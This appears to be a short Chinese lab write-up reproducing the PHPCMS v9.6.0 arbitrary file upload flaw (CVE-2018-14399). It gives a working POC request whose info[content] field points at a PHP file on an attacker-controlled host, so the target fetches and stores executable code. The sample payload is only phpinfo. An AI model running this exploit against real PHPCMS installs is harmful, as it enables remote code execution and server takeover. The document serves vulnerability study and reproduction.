一,下载安装phpcmsv966.0
1,下载官方下载phpcms v9.6.0版本,下载地址: http://download.phpcms.cn/v9/9.6/下载之后,将源码都解压到phpstudy的www目录,浏览器访问源码中的install目录,一步步安装
2,打开后台管理,进入后台,后台账号密码为之前安装时候设置的账号密码
二、漏洞复现
1,查询资料可知,任意文件上传漏洞出现在,PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。
2,漏洞利用,在phpcms注册界面,填写信息进行抓包
3、在另一个系统(kali),开启web服务,然后在web根目录下创建一个txt文件,写入如下信息
vim shell.txt
<?php phpinfo();?>
4. 构造POC
siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=<img src=http://192.168.190.134/shell.txt?.php#.jpg>&dosubmit=1&protocol=
5,访问得到的上传路径,可以看到脚本正常执行
2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
原文:https://www.cnblogs.com/sym945/p/11825504.html